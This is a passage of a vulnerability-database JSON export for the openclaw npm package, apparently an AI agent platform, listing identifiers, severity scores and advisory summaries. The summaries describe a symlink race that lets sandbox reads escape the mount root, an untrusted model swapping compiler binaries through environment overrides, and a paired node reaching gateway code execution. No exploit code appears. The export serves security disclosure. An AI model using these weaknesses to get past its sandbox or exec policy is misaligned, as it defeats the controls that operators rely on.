9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-
vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41302","GHSA-9q7v-8mr7-g23p"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ykwt-tdpa-3bft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92141?format=json","vulnerability_id":"VCID-ymmv-2qmq-6kap","summary":"OpenClaw: OpenShell FS bridge reads pin and verify the opened file before returning bytes\n## Summary\nOpenShell FS bridge reads pin and verify the opened file before returning bytes \n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA time-of-check/time-of-use race around OpenShell sandbox filesystem reads could let a symlink swap cause bytes outside the intended mount root to be read.\n\n## Fix\nOpenShell reads now open the file with no-follow semantics where available, validate the pinned file descriptor against the canonical mount root, reject unsafe hardlink/symlink cases, and use a strict fallback ancestor walk on 
platforms without fd-path readback.\n\n## Fix Commit(s)\n- 95119017c847c737bd113f0bff728c4666d79c45\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nThanks @VladimirEliTokarev for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44113","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09994","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09978","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11564","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44113"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/
SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"}],"url":"https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44113","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44113"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elemen
ts":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge"},{"reference_url":"https://github.com/advisories/GHSA-5h3g-6xhh-rg6p","reference_id":"GHSA-5h3g-6xhh-rg6p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h3g-6xhh-rg6p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44113","GHSA-5h3g-6xhh-rg6p"],"risk_score":3.8,"exploitability":"0.5","weighted_severity":"7.5","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ymmv-2qmq-6kap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89362?format=json","vulnerability_id":"VCID-ynup-4v9e-tbh4","summary":"OpenClaw: Incomplete host-env-security-policy allows untrusted model to substitute compiler binaries via env overrides\n## Summary\nIncomplete `host-env-security-policy.json` allows untrusted model to substitute compiler binaries (`CC`, `CXX`, `CARGO_BUILD_RUSTC`, 
`CMAKE_C_COMPILER`) via env overrides on approved host exec requests\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 host-env policy missed compiler override vars, but exploitation still requires an approved host-exec request inside the existing exec trust domain, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e277a37f896b5011a1df06e6490c6630074d0afa` — 2026-03-30T20:06:32+01:00\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41373","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02541","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02487","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02543","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41373"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.
3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41373","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41373"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-v
ariable-override-in-host-execution-policy","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy"},{"reference_url":"https://github.com/advisories/GHSA-g8xp-qx39-9jq9","reference_id":"GHSA-g8xp-qx39-9jq9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g8xp-qx39-9jq9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulne
rability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulne
rability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41373","GHSA-g8xp-qx39-9jq9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ynup-4v9e-tbh4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90041?format=json","vulnerability_id":"VCID-yp2w-pc58-9bf6","summary":"OpenClaw: Paired node escalates to gateway RCE via unrestricted node.event agent dispatch\n## Summary\nPaired node escalates to gateway RCE via unrestricted node.event agent dispatch\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets paired role=node clients drive node.event agent.request into broader gateway-side tool access than node RPCs, but critical is overstated because a trusted paired node foothold is already required.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable 
tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a77928b1087e90f2a8903f8e5aca6dec9237ac62` — 2026-03-30T14:22:15+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41378","reference_id":"","reference_type":"","scores":[{"value":"0.00285","scoring_system":"epss","scoring_elements":"0.52312","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00285","scoring_system":"epss","scoring_elements":"0.52299","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00285","scoring_system":"epss","scoring_elements":"0.5232","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41378"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62"},{"reference_url":"
https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41378","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41378"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch","reference_
id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch"},{"reference_url":"https://github.com/advisories/GHSA-gjm7-hw8f-73rq","reference_id":"GHSA-gjm7-hw8f-73rq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gjm7-hw8f-73rq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"